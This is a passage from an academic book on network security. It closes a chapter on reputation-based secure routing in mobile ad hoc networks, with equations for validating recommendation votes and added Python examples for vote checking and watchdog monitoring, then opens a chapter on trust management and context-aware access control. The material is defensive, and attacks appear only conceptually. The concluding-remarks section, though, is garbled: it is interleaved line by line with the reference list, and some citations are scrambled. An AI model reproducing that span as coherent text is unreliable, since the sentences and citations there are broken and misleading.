The trust history evolution of own and immediate nodes is stored at every node in the appropriate reputation parameters, represented by L-length vectors. This set of information is used for validating incoming second-hand votes by means of correlation analysis. Note that the own experience vector OE is a weighted moving average (MA) process of order L. The γ function coefficients determine the dynamics of changes in the MA process and make all observations jointly dependent. As defined in Equations (4) and (5), the correlation is propagated to the service reputation (SR) and the information reputation (IR) (and indirectly, through IR, to CR and PR).

The correlation validation is based on the autocorrelation functions of own experience, \hat{R}^O_n, and of second-hand information, \hat{R}^V_n, and on the distance functions D^O and D^V, respectively:

D^O = \sum_{i=0}^{L-1} \left(\hat{R}^O_i - \hat{R}^V_{i+1}\right)^2    (8)

D^V = \sum_{i=0}^{L-1} \left(\hat{R}^V_i - \hat{R}^V_{i+1}\right)^2    (9)

where \hat{R}^O_n and \hat{R}^V_n are estimators of the autocorrelation function, known as a convolution time series, evaluated for a linear and stationary system such as the reputation system:

\hat{R}^O_i = \sum_{n=0}^{L-1} OE_n\, OE_{n-i}    (10)

\hat{R}^V_i = \sum_{n=0}^{L-1} V_n\, V_{n-i}    (11)

The distance functions, evaluated for every new vote V, provide a measure of the change in correlation between own experience and the already known history of votes from a particular node. Any attempt at voting unrelated to the historical observations will be revealed by a substantial increase of the distance function D^V. Additionally, we can observe how much our own experience differs from that received from neighbouring nodes by analyzing the value of D^O. These two metrics should be taken into account when their values exceed thresholds defined separately for each of them, Th^O and Th^V. When abnormal behaviour is detected, the following actions may be undertaken:

• D^O > Th^O and D^V > Th^V – the votes from the misbehaving nodes are rejected and their information reputation is arbitrarily decreased.
• D^O < Th^O and D^V > Th^V – the votes are accepted but the service reputation (SR) is updated with a higher scaling factor α. This less restrictive approach gives the ability to react to a dynamically changing reputation but prevents malicious attacks from discrediting targeted nodes too fast.
• D^O > Th^O and D^V < Th^V – in this case the node's reaction should be similar to the previous anomaly; however, it may be symptomatic of a long-term attack against the reputation service by nodes acting in collusion.

During message exchange every node collects its own experience of elementary interactions STE. The following list describes the types of behaviour that can be taken into consideration during reputation building:

• Forwarding: During network operations nodes are able to verify the integrity of messages anonymously forwarded on their behalf by overhearing the first intermediate node. Every message tampering, delay, double relay, and drop is detected as malicious behaviour.
• Receiving: Every obtained message that could not be successfully verified, repeated messages, and broken paths without an error message notification coming from the involved immediate node should be treated as untrustworthy.
• Anonymous path establishing: In the case of ANAP, anonymous path establishment is a three-pass process and in every phase multilayered operations are performed. By default every request packet REQ should be forwarded only once by every node. In the case of detection of behaviour inconsistent with these rules, or of obtaining multiple copies of reply REP or error ERR messages, the reputation system should be informed.
• Recommendation exchanging: Sharing reputation between nodes allows comparing one's own experience with that given by recommending nodes. In the case where one of the votes differs much from the rest of the voters, there is a presumption of node discrediting. Additional statistical cross-validation methods (Hildebrand, Laing, & Rosenthal, 1977) may be used for evaluating this case.

The interaction of the presented reputation system with the anonymous authentication protocol is performed so as to ensure purely anonymous communication. The reputation information is exchanged between nodes on demand of the interested node, encrypted with the public key of the message originator. This ensures that recommendation sharing is hidden and may be read only by legitimate recipients.

FUTURE TRENDS

In the contemporary information society, mobile ad hoc networks are a promising and very attractive alternative to wireless access networks. The solution for managing routing in secure MANETs proposed in the previous section is based on a distributed reputation system. We expect that in the near future a class of new attacks will appear focusing on the reputation system. Keeping in mind that the security of every system depends on its weakest point, the potential vulnerabilities of the reputation system may be treated as an important challenge for future research. Two interesting forms of attack on the reputation system are the Sybil and the collusion attack. In the first case, the attacker takes advantage of using multiple identities for the adversary's node, while in the second several malicious nodes are in collusion. In both cases it is highly possible that own experience and shared reputation may be affected by these attacks. The autocorrelation analysis for anomaly detection in reputation recommendations proposed by us may not be sufficiently sensitive to cope with the mentioned attacks. Currently, a statistical method for validating recommendations, such as cross-validation (Hildebrand et al., 1977), has been proposed and is being developed. It is a very promising direction of research, since cross-validation is very flexible and easily applicable to complex data. On the other hand, the method is mathematically rigorous, so the obtained results are verifiable and easy to implement.

Another interesting area is secure routing in MANETs enforced by an ontology-based reputation system (Caballero, Botia, & Gomez-Skarmeta, 2006). A concept-based reputation may be identified as a reputation created for the different types of services provided in a MANET, with the ability to create similarity measures between them. This approach in a natural way improves the model of incentives for ad hoc communication, giving the ability to treat MANET networks as service oriented.

At the moment several applications outside the strict MANET paradigm take advantage of dynamic ad hoc routing and make use of it in wireless environments akin to MANETs, such as wireless mesh networks or vehicular ad hoc networks (VANETs). This example shows that research in the MANET area may bear unlimited applications.
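As an added example, not code from the chapter or from ANAP, the Python below implements the vote validation of Equations 8 through 11 and the three decision rules listed above. It reads the index i+1 in Equations 8 and 9 as the autocorrelation estimator recomputed after the new vote has been appended to the L-length vote history, so that D^V measures how much a single vote changes the autocorrelation of that recommender's votes and D^O how far the vote history, new vote included, lies from B's own experience. That reading, the window length L, the thresholds Th^O and Th^V, and the sample histories are assumptions.

```python
"""Correlation-based validation of second-hand votes (Equations 8-11) with the chapter's
three anomaly cases. Added example; the reading of the i+1 index, L, both thresholds and the
sample histories are assumptions, not the chapter's definitions."""
from typing import List, Sequence, Tuple

L = 4       # length of the reputation history vectors (assumption)
TH_O = 0.5  # threshold on D^O (assumption)
TH_V = 0.5  # threshold on D^V (assumption)


def autocorrelation(series: Sequence[float]) -> List[float]:
    """Eqs. 10/11: R_i = sum_n x_n * x_{n-i} over the last L samples, for lags i = 0..L-1.
    Products whose second index would fall before the window are dropped (assumption)."""
    x = list(series)[-L:]
    return [sum(x[n] * x[n - i] for n in range(i, len(x))) for i in range(L)]


def squared_distance(r_a: Sequence[float], r_b: Sequence[float]) -> float:
    """Common shape of Eqs. 8 and 9: sum over lags of the squared estimator difference."""
    return sum((a - b) ** 2 for a, b in zip(r_a, r_b))


def decide(d_o: float, d_v: float) -> str:
    """The three anomaly cases of the chapter, plus the unremarkable case."""
    if d_o > TH_O and d_v > TH_V:
        return "reject"                    # discard the vote, arbitrarily decrease the voter's IR
    if d_o <= TH_O and d_v > TH_V:
        return "accept-higher-alpha"       # accept, but update SR with a larger own-experience weight
    if d_o > TH_O and d_v <= TH_V:
        return "accept-suspect-collusion"  # voters agree with each other but not with own experience
    return "accept"


def validate_vote(oe_history: Sequence[float], vote_history: Sequence[float],
                  new_vote: float) -> Tuple[float, float, str]:
    """Return (D^O, D^V, action) for one incoming vote from a given recommender.

    oe_history:   B's own-experience vector OE for the recommended node, oldest first.
    vote_history: earlier votes V from the same recommender about that node, oldest first.
    """
    r_o = autocorrelation(oe_history)                             # Eq. 10
    r_v_before = autocorrelation(vote_history)                    # Eq. 11 on the known history
    r_v_after = autocorrelation(list(vote_history) + [new_vote])  # Eq. 11 with the new vote
    d_o = squared_distance(r_o, r_v_after)                        # Eq. 8
    d_v = squared_distance(r_v_before, r_v_after)                 # Eq. 9
    return d_o, d_v, decide(d_o, d_v)


# Constructed sample histories (not measurements): B's own experience with A, and C's past votes on A.
STEADY_OE = [0.8, 0.8, 0.8, 0.8]
RECENT_MISBEHAVIOUR_OE = [0.8, 0.8, 0.8, -0.8]
HONEST_VOTES = [0.8, 0.8, 0.8, 0.8]


def demo() -> List[str]:
    """Run the four situations discussed in the chapter and return the chosen actions."""
    return [
        validate_vote(STEADY_OE, HONEST_VOTES, 0.8)[2],                # vote consistent with everything
        validate_vote(STEADY_OE, HONEST_VOTES, -0.8)[2],               # sudden slander of A by C
        validate_vote(RECENT_MISBEHAVIOUR_OE, HONEST_VOTES, -0.8)[2],  # C's vote tracks what B also saw
        validate_vote(RECENT_MISBEHAVIOUR_OE, HONEST_VOTES, 0.8)[2],   # votes steady, B's experience not
    ]
```

On the constructed histories a single slanderous vote moves D^V from 0 to about 4.9, far above the assumed threshold, while D^O separates the case where B itself has just observed A misbehaving (the vote is accepted with a higher α) from the case where the recommender keeps praising a node that B has seen fail (the collusion suspicion of the third rule).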
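The behaviour list above describes what a node observes; the Python below is an added example, not the chapter's or ANAP's code, of a watchdog at node B that turns overheard traffic from its next hop A into the metric vector m that Equation (1) weights into an STE. It covers message tampering, drops, delays and double relays from the Forwarding item and repeated forwarding of the same REQ from the Anonymous path establishing item. The event format, the timing thresholds, the mapping of each count onto <-1, 1> and the sample trace are assumptions, and the trace is constructed rather than captured.

```python
"""Watchdog at node B: overheard traffic from next hop A becomes the metric vector m of Eq. 1.

Added example; the event format, the timing thresholds, the mapping of counts onto <-1, 1>
and the sample trace are assumptions, not the chapter's or ANAP's definitions.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

# (time in seconds, kind, packet or request id, payload as heard on the air)
Event = Tuple[float, str, str, bytes]

DELAY_LIMIT = 0.05   # a relay later than this counts as delayed (assumption)
DROP_TIMEOUT = 0.20  # no relay within this window counts as a drop (assumption)
METRIC_ORDER = ("tamper", "drop", "delay", "double_relay", "req_replay")


def watch(trace: List[Event], now: float) -> Tuple[List[float], Dict[str, List[str]]]:
    """Classify A's handling of what B gave it and return (metrics, findings).

    Event kinds: "sent" = B handed the packet to A for forwarding; "overheard" = B overheard A
    transmitting that packet id; "req_forward" = B overheard A forwarding a route request id.
    """
    sent: Dict[str, Tuple[float, bytes]] = {}
    relays: Dict[str, List[Tuple[float, bytes]]] = defaultdict(list)
    req_forwards: Dict[str, int] = defaultdict(int)
    for t, kind, pid, payload in trace:
        if kind == "sent":
            sent[pid] = (t, payload)
        elif kind == "overheard":
            relays[pid].append((t, payload))
        elif kind == "req_forward":
            req_forwards[pid] += 1
        else:
            raise ValueError(f"unknown event kind {kind!r}")

    findings: Dict[str, List[str]] = {k: [] for k in METRIC_ORDER}
    for pid, (t_sent, payload) in sent.items():
        seen = relays.get(pid, [])
        if not seen:
            if now - t_sent > DROP_TIMEOUT:
                findings["drop"].append(pid)   # still not relayed after the timeout
            continue                            # otherwise undecided, not counted yet
        t_relay, relayed = seen[0]
        if relayed != payload:
            findings["tamper"].append(pid)      # content changed between B and A's transmission
        if t_relay - t_sent > DELAY_LIMIT:
            findings["delay"].append(pid)
        if len(seen) > 1:
            findings["double_relay"].append(pid)
    for rid, count in req_forwards.items():
        if count > 1:
            findings["req_replay"].append(rid)  # a REQ must be forwarded once per node

    # Each metric is +1 when nothing was observed and -1 when every packet was affected.
    def score(kind: str, total: int) -> float:
        return 1.0 - 2.0 * len(findings[kind]) / total if total else 1.0

    n_pkt, n_req = len(sent), len(req_forwards)
    metrics = [score(k, n_req if k == "req_replay" else n_pkt) for k in METRIC_ORDER]
    return metrics, {k: v for k, v in findings.items() if v}


# Constructed trace (not captured traffic): five data packets handed to A and two REQs.
SAMPLE_TRACE: List[Event] = [
    (0.00, "sent", "p1", b"hello"), (0.01, "overheard", "p1", b"hello"),    # clean relay
    (0.02, "sent", "p2", b"pay 10"), (0.03, "overheard", "p2", b"pay 99"),  # tampered in transit
    (0.04, "sent", "p3", b"route"),                                         # never relayed
    (0.06, "sent", "p4", b"data"), (0.07, "overheard", "p4", b"data"),
    (0.09, "overheard", "p4", b"data"),                                     # relayed twice
    (0.08, "sent", "p5", b"slow"), (0.20, "overheard", "p5", b"slow"),      # late relay
    (0.10, "req_forward", "r1", b""),
    (0.11, "req_forward", "r2", b""), (0.12, "req_forward", "r2", b""),     # same REQ forwarded twice
]


def sample_metrics() -> Tuple[List[float], Dict[str, List[str]]]:
    """Evaluate the constructed trace one second in, after the drop timeout has expired."""
    return watch(SAMPLE_TRACE, now=1.0)
```

The resulting vector (one affected packet out of five for each of the four forwarding metrics, and one of two REQs replayed) is what a node would pass, with its weights, to Equation (1); a packet that is merely not yet relayed stays undecided until the timeout so that slow but honest relays are not scored as drops.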


Secure Routing with Reputation in MANET

concludIng rEMArks Boukerche, A., El-Khatiba, K., Xua, L., & Korba,
L..)052An
( efficient secure distributed anony -
In this chapter we presented a new approach of mous routing protocol for mobile and wireless ad
distributed reputation-based secure routing mecha- hoc network. Computer Communications, 28(10),
nism in MANET. In the background section the 1193-1203.
main concepts of secure and anonymous mobile
Buchegger, S. (2005). Self-policing mobile ad hoc
ad hoc networks were presented. The overview
networks by reputation systems. IEEE Communi-
of applied authentication schemes in secure MA-
cations Magazine, 43(7), 101-107.
NET was analyzed giving an introduction to trust
management and reputation basis as a mean for Buchegger, S., & Le Boudec, J.-Y. (2002, June).
detecting misbehaviour and improving the routing Performance analysis of the CONFIDANT pro-
performance. tocol: Cooperation of nodes fairness in dynamic
In the main part of this chapter we focused on ad-hoc networks. In Proceedings of IEEE/ACM
a new proposal of a distributed reputation system, Symposium on Mobile Ad Hoc Networking and
which was an extension of the Liu and Issarny Computing (MobiHOC), Lausanne, Switzerland,
(2004) model and which was introduced in the (pp. 226-236).
anonymous authentication protocol for mobile ad
Caballero, A., Botia, J. A., & Gomez-Skarmeta,
hoc networks (Ciszkowski & Kotulski, 2006). We
A. F. (2006). A new model for trust and reputation
emphasized in the proposal the method of evaluat-
management with an ontology based approach for
ing recommendation reputation considering the
similarity between tasks. In K. Fischer, I. J. Timm,
past experience and recommendation reputation
E.André,N.& Zhong(Eds.,) Multi-agent System
of voters. We defined two types of the second-
Technologies, 4th German Conference, MATES
hand information, related to the immediate nodes
02 6 , Erfurt, Germany, (LNCS 4196, pp. 172-183).
and cumulative reputation, describing aggregated
Berlin: Springer.
reputation of immediate nodes’ neighbourhood.
Second-hand information is exchanged on demand Chaum, D. (1981). Untraceable electronic mail,
of interested nodes. In order to detect the malicious return addresses, and digital pseudonyms. Com-
activity and any anomalies in the information munications of the ACM, 24(2), 84-88.
exchange we incorporated the second-hand recom-
mendation validation by the statistical correlation Ciszkowski, T., & Kotulski, Z. (2006). ANAP:
approach. Anonymous authentication protocol in mobile ad
We pointed out the the security in MANET is hoc networks. Paper presented at the 10th Domestic
a primary concern for researchers, in particular Conference on Applied Cryptography ENIGMA,
this becomes a very important issue since several Warsaw, Poland, (pp. 191-203).
applications apart from strict MANET commu- Hildebrand, D. K., Laing, J. D., & Rosenthal, H.
nication model take advantage of the dynamic ad (1977). Predictionanalysisofcrossclassification .
hoc routing phenomenon. New York: John Wiley & Sons.
Hu, Y., & Perrig, A. (2004). A survey of secure
rEfErEncEs wireless ad hoc routing. IEEE Security & Privacy
Magazine, 2(3), 28-39.
Blaze, M., Feigenbaum, J., & Lacy, J. (1996). De- Hu, Y.-C., Perrig, A., & Johnson, D. B. (2005).
centralized trust management. In Proceedings of Ariadne: A secure on-demand routing protocol
the IEEE Symposium on Security and Privacy (p. for ad hoc networks. Wireless Networks, 11(1-2),
164). IEEE Xplore. 21-38.


Secure Routing with Reputation in MANET

Huang, C., Hu, H., & Wang, Z. (2006, September 3-6). A dynamic trust model based on feedback control mechanism for P2P applications. In L. T. Yang, H. Jin, J. Ma, & T. Ungerer (Eds.), Proceedings of Third International Conference on Autonomic and Trusted Computing (ATC 2006), Wuhan, China, (LNCS 4158, pp. 312-321). Berlin: Springer.

Hussain, F., Chang, E., & Dillon, T. S. (2004, March). Classification of trust in logistic peer-to-peer communication. In Proceedings of the IEEE International Conference on Sciences of Electronic, Technologies of Information and Telecommunications (SETIT 2004), Sousse, Tunisia.

Johnson, D. B. (1994). Routing in ad hoc networks of mobile hosts. In Proceedings of IEEE Workshop on Mobile Computing Systems and Applications (pp. 158-163). IEEE Press.

Jøsang, A. (2002, July). Subjective evidential reasoning. In Proceedings of the 9th International Conference on Information Processing and Management of Uncertainty in Knowledge-Based Systems (IPMU 2002), Annecy, France.

Kong, J., & Hong, X. (2003). ANODR: Anonymous on demand routing with untraceable routes for mobile ad-hoc networks. In Proceedings of the 4th ACM International Symposium on Mobile Ad Hoc Networking & Computing (MobiHoc03), Annapolis, MD, (pp. 291-302).

Kong, J., Hong, X., & Gerla, M. (2005). Mobility changes anonymity: Mobile ad hoc networks need efficient anonymous routing. In Proceedings of 10th IEEE Symposium on Computers and Communications (ISCC 2005) (pp. 57-62). IEEE Computer Society.

Lee, K.-M., Hwang, K.-S., Lee, J.-H., & Kim, H. J. (2006, September). A fuzzy trust model using multiple evaluation criteria. In L. Wang, L. Jiao, G. Shi, X. Li, & J. Liu (Eds.), Proceedings of Third International Conference on Fuzzy Systems and Knowledge Discovery (FSKD 2006) (LNCS 4223, pp. 961-969). Berlin: Springer.

Liu, J., & Issarny, V. (2004, March 29-April 1). Enhanced reputation mechanism for mobile ad hoc networks. In C. Jensen, S. Poslad, & T. Dimitrakos (Eds.), Proceedings of Second International Conference on Trust Management (iTrust 2004), Oxford, UK, (LNCS 2995, pp. 48-62). Berlin: Springer.

Mangipudi, K., Katti, R., & Fu, H. (2006). Authentication and key agreement protocols preserving anonymity. International Journal of Network Security, 3(3), 259-270.

Nilsson, N. J. (1986). Probabilistic logic. Artificial Intelligence, 28(1), 71-87.

Papadimitratos, P., & Haas, Z. (2002, January 27-31). Secure routing for mobile ad hoc networks. In Proceedings of the SCS Communication Networks and Distributed Systems Modelling and Simulation Conference (CNDS 2002), San Antonio, (pp. 192-204).

Perkins, C., & Royer, E. (1999, February). Ad hoc on-demand distance vector routing. In Proceedings of the 2nd IEEE Workshop on Mobile Computing Systems and Applications, New Orleans, (pp. 90-100).

Pfitzmann, A., & Hansen, M. (2005). Anonymity, unobservability, pseudonymity, and identity management: A proposal for terminology. Retrieved October 4, 2007, from http://dud.inf.tu-dresden.de/Literatur_V1.shtml

Royer, E., & Toh, C. (1999, April). A review of current routing protocols for ad hoc mobile wireless networks. IEEE Personal Communications, 6(2), 46-55.

Sanzgiri, K., Dahill, B., Levine, B. N., Shields, C., & Belding-Royer, E. M. (2002, November). A secure routing protocol for ad hoc networks. In Proceedings of 10th IEEE International Conference on Network Protocols (pp. 78-87). IEEE Press.

Yang, H., Luo, H., Ye, F., Lu, S., & Zhang, L. (2004). Security in mobile ad hoc networks: Challenges and solution. IEEE Wireless Communications, 11(1), 38-47.
Zapata, Z. G., & Asokan, N. (2002). Securing ad hoc routing protocols. In Proceedings of ACM Workshop on Wireless Security (WiSe 2002) (pp. 1-10). ACM Press.

Zhang, Y., Liu, W., & Lou, W. W. (2005). Anonymous communications in mobile ad hoc networks (INFOCOM 2005). In Proceedings of 24th Annual Joint Conference of the IEEE Computer and Communications Societies (Vol. 3, pp. 1940-1951). Proceedings IEEE.

Zimmermann, J. (1994). PGP user's guide. Cambridge: MIT Press.

KEY TERMS

Anonymity: Aims at hiding an entity's identity completely.

Anonymous Authentication: A method of proving that someone has rights to certain actions or resources without disclosing the user's real identity.

Attacks: Attacks on MANET can destroy availability of nodes (attacks on routing) and contest the reputation of nodes.

Authentication: A method of proving someone's identity, especially if that someone is an authorized user of processes or resources.

Collusion Attack: A number of adversary nodes make a coalition against the reputation of other nodes.

Cross-validation: A statistical method derived from cross-classification whose main objective is to detect the outlying point in a population set. It is a candidate method for anomaly detection in reputation sharing (recommendations) and regular communication in MANET.

Denial-of-Service (DoS) attack: An attempt at keeping access to computer resources (nodes) unavailable, especially by generating dummy traffic from one source (DoS) or a large number of sources (distributed DoS [DDoS]).

MANET: Mobile ad hoc network is a self-configuring network of freely moving nodes connected by wireless links that can constitute a path joining two arbitrary nodes of the network.

Privacy: The ability of keeping secret someone's identity, resources, or actions. It is realized by anonymity and pseudonymity.

Pseudonymity: Hides the user's real identity behind some virtual identity called a pseudonym.

Reputation: Perceived grade of trustworthiness of a particular peer created by their historical behaviour during observations and interactions with third party peers in the given context and time.

Routing: A method of selecting a path (a chain of links between neighbouring nodes) from a source node to a destination node. One can distinguish two groups of protocols designed for MANET: reactive (on-demand) and proactive (table-driven). The first type tries to resolve a path to a destination node on the source node's demand, whereas the second approach is more preventive and continuously keeps routing tables up to date by monitoring the nearest neighbourhood.

Security: Security of a system means that the system does exactly what it is designed to do and nothing else, even in the case of attack. Secure MANET enables reliable routing: privacy of communication with an immediate degree of authentication of the parties of the information exchange process.

Sybil Attack: When one adversary node uses several identities to multiply its ability of rating other nodes in MANET.

Trust: A subjective probability of one peer (trustee) that particular actions of another peer (trusted), which they are willing and capable to perform, will be done according to the trustee's expectations in the given context and time.

VANET: A form of mobile ad hoc network, to provide communications among nearby vehicles and between vehicles and nearby fixed equipment, usually described as roadside equipment.


Chapter XXIX
Trust Management and
Context-Driven Access Control
Paolo Bellavista
University of Bologna, Italy

Rebecca Montanari
University of Bologna, Italy

Daniela Tibaldi
University of Bologna, Italy

Alessandra Toninelli
University of Bologna, Italy

AbstrAct

The increasing diffusion of wireless portable devices and the emergence of mobile ad hoc networks promote
anytime and anywhere opportunistic resource sharing. However, the fear of exposure to risky interac-
tions is currently limiting the widespread uptake of ad hoc collaborations. This chapter introduces the
challenge of identifying and validating novel security models/systems for securing ad hoc collaborations,
by taking into account the high unpredictability, heterogeneity, and dynamicity of envisioned wireless
environments. We claim that the concept of trust management should become a primary engineering
design principle, to associate with the subsequent trust refinement into effective a
thus calling for original and innovative access control models. The chapter overviews the state-of-the-
art solutions for trust management and access control in wireless environments by pointing out both
the need for their tight integration and the related emerging design guidelines, that is, exploitation of
context awareness and adoption of semantic technologies.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Trust Management and Context-Driven Access Control

INTRODUCTION

Wireless telecommunication systems and the Internet are converging towards an integrated distributed environment that permits users to access/share services and to collaborate anytime and anywhere even when they are on the move. The increasing diffusion of portable devices with wireless connectivity and the emergence of mobile ad hoc networks (MANET) further promote opportunistic and temporary resource sharing by enabling mobile users in physical proximity of each other to spontaneously form ad hoc communities without the need to rely on the availability of a fixed network infrastructure. Mobile file sharing, mobile e-campus, emergency response, and vehicle coordination are just a few collaborative application examples that illustrate the novel opportunities leveraged by envisioned and converged wired-wireless networks of the future. Hereinafter we will indicate this integrated network computing scenario formed by fixed Internet hosts, wireless terminals and wireless access points in between, as well as by collections of wireless mobile hosts forming MANET without the aid of any established fixed infrastructure, with the comprehensive term of wireless Internet.

However, the fear of exposure to risky interactions (possibly compromising confidentiality, availability, and integrity of both data and services) is currently limiting the widespread uptake of anywhere and anytime collaboration. To some extent, the above risk is present in any traditional distributed collaborative setting, but the wireless Internet exacerbates the perception of that risk because of the complex security challenges arising from the increased degree of openness and dynamicity of the scenario. Collaborating participants often cannot be statically preidentified; they usually change frequently due to high mobility and/or occasional failures, forming continuously varying ad hoc coalitions with entities entering and leaving groups dynamically. At the same time, roaming participants are often interested in establishing opportunistic collaborations with dynamically discovered partners, without having previous knowledge or long-term pre-established relationships with them. One of the most difficult security challenges in these environments is how to decide whom to trust in the plethora of opportunistically discovered entities. In addition, MANET introduce a further level of complexity to secure collaborative applications: differently from traditional fixed networks where dedicated nodes support basic networking functions, for example, routing, in MANET these functions are carried out by available peers in the network, and there is no reason to assume that these peers will all cooperate uniformly. For instance, because network operations consume energy, some nodes may exhibit a selfish behavior and deny their cooperation, thus leading to severe degradation of network performance and functioning.

To protect and/or provide incentives for anywhere and anytime collaborations, there is the need for appropriate security models/systems that should follow novel design guidelines to take into account the high unpredictability, heterogeneity, and dynamicity of wireless Internet environments. In those scenarios where identities/roles of collaborating entities are difficult to be a-priori established, we claim that the concept of trust should become a primary design principle for the engineering of secure collaborative applications (Cahill, Gray, Seigneur, Jensen, Yong, Shand, et al., 2003; Capra, 2004; Kagal, Finin, Joshi, 2001; Ruohomaa & Kutvonen, 2005). Trust provides a means to reduce the exposure to risky transactions in unfamiliar environments where there is no possibility to offer absolute protection against potential dangers. Trust solutions allow entities to decide whether to accept or refuse the dangers presumably associated with interactions with other entities. How to access resources and to whom to grant permissions should depend on the trust degree that collaborating entities mutually have.

Using trust as the basis to support secure ad hoc collaborations requires the design of novel trust management frameworks that enable entities to form, maintain, and evolve trust opinions in highly dynamic wireless environments. In fact, the wireless Internet deployment scenario poses complex issues to trust management and requires rethinking traditional solutions based

on assumptions that are unacceptable in these environments (Cahill et al., 2003; Capra, 2004). In fact, in traditional distributed systems trust decisions can be delegated to centralized and trusted third parties with full visibility and control over the whole trust management domain (most entities are fixed and statically known). On the contrary, in the wireless Internet the lack of both a globally available trust management infrastructure and clearly defined administrative boundaries calls for fully decentralized and self-organized trust solutions. Moreover, trust management solutions are effective as far as it is possible to bind trust opinions to security decisions. We claim that trust management should be considered as the key starting point for the subsequent refinement of trust specifications into security policies related to authorization and security management. In particular, authorization can be seen as the outcome of the refinement of trust relationships among strangers (Grandison & Sloman, 2000).

Therefore, the issue of access control is also crucial for the provisioning of anytime and anywhere collaborative applications, and raises challenges similar to trust management, thus calling for novel access control models. Only a few proposals are starting to emerge in that research area, by addressing two main needs. A primary requirement is to design/develop access control solutions that take into account the heterogeneity and dynamicity of available services, computing devices, and user characteristics. Along this direction, the emerging design guideline for novel access control solutions advocates a paradigm shift from subject-centric access control models to context-centric ones (Covington, Long, Srinivasan, Dey, Ahamad, & Abowd, 2001; Corradi, Montanari, & Tibaldi, 2004; Ko, Won, Shin, Choo, & Kim, 2006; Toninelli, Montanari, Kagal, & Lassila, 2006). Hereinafter, at a high abstraction level, the term "context" is defined as any information that is useful for characterizing the state or the activity of an entity or the world where this entity operates (Dey, Abowd, & Salber, 2001). Differently from subject-centric solutions where context is an optional element of policy definition, simply used to restrict the applicability scope of the permissions assigned to the subject, in context-centric solutions context is the first-class principle that explicitly guides both policy specification and enforcement; it is not possible to define a policy without the explicit specification of the context making the policy valid. The second main requirement is the full integration of novel trust models/solutions with trust-dependent (possibly context-aware) access control policies. That integration represents the most significant goal of state-of-the-art research in security for ad hoc wireless collaborations, with currently only a very few proposals at an early stage.

The achievement of secure, open, and dynamic wireless collaborations requires not only proper trust and access control models, but also shared and interoperable vocabularies for trust and access control to avoid inconsistent interpretations. Some initial research efforts tend to propose the adoption of ontological technologies as a significant guideline toward common policy understanding (Kagal, Finin, & Joshi, 2003; Tonti et al., 2003; Uszok, Bradshaw, & Jeffers, 2004). Semantically rich representations of trust and access control policies permit resource/context descriptions at different levels of abstraction and enable reasoning about both structure and properties of entities, context, and operations, thus enabling flexible opportunities for policy analysis, conflict detection, and harmonization. It is worth noticing that current security solutions for wireless Internet collaborations represent interesting steps forward, but are still more proof-of-concept prototypes of single aspects rather than comprehensive methodological and technical reference guides.

The goal of the chapter is to survey the most relevant support solutions in the literature by considering the two primary research directions emerging in the area, that is, trust management and semantic context-driven access control. In particular, examples of solutions in each category will be presented in the Trust Management section and the Semantic Context-driven Access Control section, respectively. The COMITY Framework section will focus on the main design choices of our trust-dependent context-aware middleware proposal, with the aim of exemplifying the main concerns and solution guidelines about the integration of trust and access control management. Primary open issues and expected directions of evolution end the chapter.
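The difference between the two policy styles can be made concrete in code. The following is an added example, not code from the chapter or from the COMITY middleware it describes: a subject-centric policy binds a permission to a pre-identified subject and treats context as an optional restriction, while a context-centric policy cannot be created without the context condition that makes it valid and selects its subjects from that same context. The policy names, the printer resource and the two sample contexts are constructed for the demonstration.

```python
"""Subject-centric vs. context-centric policy evaluation.

Added example, not code from the chapter or from the COMITY middleware.
Policy names, resources and the sample contexts are constructed.
"""
from dataclasses import dataclass, field
from typing import Any, Callable, Dict, List

Context = Dict[str, Any]


@dataclass
class SubjectCentricPolicy:
    """Permission bound to a named subject; context only narrows its scope."""
    subject: str
    action: str
    resource: str
    # Optional context predicates: the policy is complete without them.
    restrictions: List[Callable[[Context], bool]] = field(default_factory=list)

    def permits(self, subject: str, action: str, resource: str, ctx: Context) -> bool:
        if (subject, action, resource) != (self.subject, self.action, self.resource):
            return False
        return all(check(ctx) for check in self.restrictions)


@dataclass
class ContextCentricPolicy:
    """Permission whose validity is defined by a mandatory context condition.

    Subjects are selected by a condition evaluated against the same context
    (for example "whoever attends the current meeting") instead of by a
    name fixed when the policy was written.
    """
    name: str
    action: str
    resource: str
    valid_in: Callable[[Context], bool]              # mandatory: when does this policy exist?
    subject_matches: Callable[[str, Context], bool]  # who is a subject in that context?

    def __post_init__(self) -> None:
        if self.valid_in is None:
            raise ValueError(f"policy {self.name!r}: context condition is mandatory")

    def permits(self, subject: str, action: str, resource: str, ctx: Context) -> bool:
        if (action, resource) != (self.action, self.resource):
            return False
        if not self.valid_in(ctx):      # outside its context the policy does not apply at all
            return False
        return self.subject_matches(subject, ctx)


def decide(policies, subject: str, action: str, resource: str, ctx: Context) -> bool:
    """Permit if any policy grants the request; deny by default."""
    return any(p.permits(subject, action, resource, ctx) for p in policies)


# Constructed policies for a printer in a meeting room (hypothetical resource).
SUBJECT_CENTRIC = [
    SubjectCentricPolicy("alice", "print", "room42-printer"),   # alice may always print
]
CONTEXT_CENTRIC = [
    ContextCentricPolicy(
        name="print-during-meeting",
        action="print",
        resource="room42-printer",
        valid_in=lambda c: c.get("location") == "room42" and c.get("meeting_active", False),
        subject_matches=lambda s, c: s in c.get("attendees", set()),
    ),
]

# Constructed context snapshots.
IN_MEETING = {"location": "room42", "meeting_active": True, "attendees": {"alice", "carol"}}
AFTER_HOURS = {"location": "room42", "meeting_active": False, "attendees": set()}


def demo() -> Dict[str, bool]:
    """The decisions the two models take on the same requests."""
    req = ("print", "room42-printer")
    return {
        "subject_centric_alice_after_hours": decide(SUBJECT_CENTRIC, "alice", *req, AFTER_HOURS),
        "subject_centric_carol_in_meeting": decide(SUBJECT_CENTRIC, "carol", *req, IN_MEETING),
        "context_centric_carol_in_meeting": decide(CONTEXT_CENTRIC, "carol", *req, IN_MEETING),
        "context_centric_alice_after_hours": decide(CONTEXT_CENTRIC, "alice", *req, AFTER_HOURS),
    }
```

The subject-centric rule lets alice print after hours because nothing ties the permission to the situation, and it cannot say anything about carol, who was not known when the rule was written; the context-centric rule admits any attendee while the meeting is active and simply ceases to exist outside that context, which is the property the chapter asks of policies for dynamically formed groups.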



TRUST MANAGEMENT

